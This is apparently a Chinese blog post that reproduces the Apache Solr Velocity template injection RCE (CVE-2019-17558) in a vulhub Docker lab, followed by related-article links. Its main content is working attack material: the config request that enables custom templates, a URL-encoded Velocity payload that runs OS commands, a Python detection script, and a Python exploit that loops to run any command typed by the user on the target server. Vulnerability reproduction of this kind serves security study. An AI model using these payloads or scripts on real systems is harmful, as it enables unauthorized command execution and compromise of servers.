Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)复现,python编写POC和EXP

最新推荐文章于 2024-04-20 23:43:48 发布
最新推荐文章于 2024-04-20 23:43:48 发布
阅读量510 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120625858
版权

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost ~]# cd /home/vulhub/solr/CVE-2019-17558/
[root@localhost CVE-2019-17558]# docker-compose up -d

查看端口:


[root@localhost CVE-2019-17558]# docker ps
CONTAINER ID   IMAGE               COMMAND                  CREATED          STATUS          PORTS                                       NAMES
097953dccacc   vulhub/solr:8.2.0   "docker-entrypoint.s…"   23 minutes ago   Up 23 minutes   0.0.0.0:8983->8983/tcp, :::8983->8983/tcp   cve-2019-17558_solr_1
[root@localhost CVE-2019-17558]#

漏洞复现:

默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心:

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

Vulhub里唯一的核心是demo:
通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:

POST /solr/demo/config HTTP/1.1
Host: 192.168.10.10:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

之后,注入Velocity模板即可执行任意命令:


http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在这里插入图片描述

POC编写:

import requests,re


url = "http://192.168.10.10:8983/"

api = "solr/admin/cores?indexInfo=false&wt=json"

api_res = requests.get(url+api)  # 获取所有的核心

name = re.findall('"name":"(.*)",',api_res.text)
for i in name[0:2]:  # 遍历3个核心开启params.resource.loader.enabled
    enabled = url + f"/solr/{i}/config"
    burp0_headers = {"Content-Type": "application/json"}
    burp0_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                 "params.resource.loader.enabled": "true",
                                                 "solr.resource.loader.enabled": "true", "startup": "lazy",
                                                 "template.base.dir": ""}}
    requests.post(enabled, headers=burp0_headers, json=burp0_json)  # 开启params.resource.loader.enabled
    poc = f"solr/{i}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo wwwq%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
    res = requests.get(url + poc)
    if "wwwq" in res.text[0:20]: #执行的 echo wwwq 命令
        print("CVE-2019-17558  存在")

pycharm运行结果:
在这里插入图片描述

EXP编写:

import requests,re


url = "http://192.168.10.10:8983/"

api = "solr/admin/cores?indexInfo=false&wt=json"

api_res = requests.get(url+api)  # 获取所有的核心

name = re.findall('"name":"(.*)",',api_res.text)
for i in name[0:2]:  # 遍历3个核心开启params.resource.loader.enabled
    enabled = url + f"/solr/{i}/config"
    burp0_headers = {"Content-Type": "application/json"}
    burp0_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                 "params.resource.loader.enabled": "true",
                                                 "solr.resource.loader.enabled": "true", "startup": "lazy",
                                                 "template.base.dir": ""}}
    requests.post(enabled, headers=burp0_headers, json=burp0_json)  # 开启params.resource.loader.enabled
    poc = f"solr/{i}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo wwwq%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
    res = requests.get(url + poc)
    if "wwwq" in res.text[0:20]: #执行的 echo wwwq 命令
        print("CVE-2019-17558  存在")

        while 1 :
            exp = poc.replace("echo wwwq",input("请输入你要执行的命令:"))
            print(requests.get(url + exp).text[8:-1])

pycharm运行结果:
在这里插入图片描述

~王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现nuclei——CVE-2019-17558Apache Solr Velocity模板注入远程命令执行漏洞
记录并分享学习安全的知识点..
01-26 612
一、漏洞介绍 SolrApache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入exp,攻击者经过未受权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,而后get访问接口致使服务器命令执行。 影响版本:Apache Solr 5.0.0 ~8.3.1(暂不确定)到最新版本。 二、漏洞产生的原因
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
TP-Link路由器漏洞可让攻击者无密码登录
NOSEC2019的博客
12-17 2511
近期,TP-Link修补了一个影响旗下部分Archer路由器的高危漏洞,它可让攻击者注销设备管理密码,并通过Telnet远程控制同一局域网内(家庭或学校)的设备。 这个漏洞是被IBM X-Force Red的Grzegorz Wypych发现的,他表示:“利用这个路由器漏洞,处于同一局域网的攻击者可通过Telnet改变路由器的配置,并且直连到FTP服务(如下图所示)。” 为了利用这个漏洞,攻击...
solr 历史漏洞复现之RCE漏洞CVE-2019-17558
最新发布
m0_66490812的博客
04-20 490
优先复现 Solr RCE 漏洞,严重等级较高漏洞Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
EC_Carrot的博客
07-31 467
漏洞简介 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令漏洞复现 默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心: http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json 我使用的是vulhub的环境,里面唯一的核心是demo,通过如下请求开启params.resource.loa
TP-Link 路由器被曝严重漏洞:无需密码即可登录
smellycat000的专栏
12-17 6964
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队TP-Link 修复了影响 Archer 路由器的某些严重漏洞 CVE-2019-7405,可导致潜在攻击者绕过管理员密码并...
网络安全中的POCEXP、Payload、ShellCode_网络安全payload是什么意思
ZL_1618的博客
11-04 449
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
POCEXP脚本
weixin_45007073的博客
01-25 7633
引言 在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是Proof of Concept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。 编程基础 因为市面上有关POCEXP脚本的教程比较稀少,但是比较明确的是想要写好POCEXP,一般都要有一些网络编程的基础,python的要会基本的爬虫
安全漏洞名词扫盲(POCEXPCVE,CVSS等)
qqchaozai的专栏
12-16 2万+
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXPExploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和...
CVE-2019-9995复现并改写exp
Seizerz的博客
09-06 732
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取...
MS12-020(CVE-2012-0002) exp/poc(已测试成功)
weixin_30568591的博客
03-16 558
经过验证,成功造成windows2003 sp2蓝屏 蓝屏代码为: 0x0000008e (0xc0000005, 0xf753888c, 0xbafcf964, 0x00000000) 截图为: 最后是最重要的的POC代码了: 转自(http://bbs.blackbap.org/thread-2419-1-1.html) 注:运行环境为BT5-R1 #!/u...
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
CVE-2017-12615漏洞复现pocsuite编写pocexp
willow_liang的博客
10-13 1361
CVE-2017-12615漏洞复现复现 环境搭建地址:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615 Tomcat版本:8.5.19 漏洞原理: tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对上传的文件尾部有检测,所以可以用/来绕过,如 /shell.jsp/ 源码内容: <servlet> <servlet-name>default</ser
solr 远程命令执行 (CVE-2019-17558)
YouthBelief的博客
11-01 4582
solr 远程命令执行 (CVE-2019-17558前言一、solr 远程命令执行 (CVE-2019-17558)0x01 漏洞描述0x02 影响范围0x03 漏洞利用直接用脚本0x04 漏洞修复 前言 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。VelocityApache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 一、solr 远程命令执行 (CVE-2019-175
计算机漏洞安全相关的概念POCEXP 、VUL 、CVE 、0DAY
热门推荐
可爱的我可爱的code
03-01 2万+
1.POC POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。 2.EXP EXPExploit,中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。 3.VUL VUL,Vulnerab...
计算机漏洞安全相关的概念POC | EXP | VUL | CVE | 0DAY
lixue20141529的博客
05-07 1万+
转:http://blog.csdn.net/wangjianno2/article/details/513390641.POC        POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。 2.EXP        EXPExploit,中文意思是“漏洞利用”。...
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值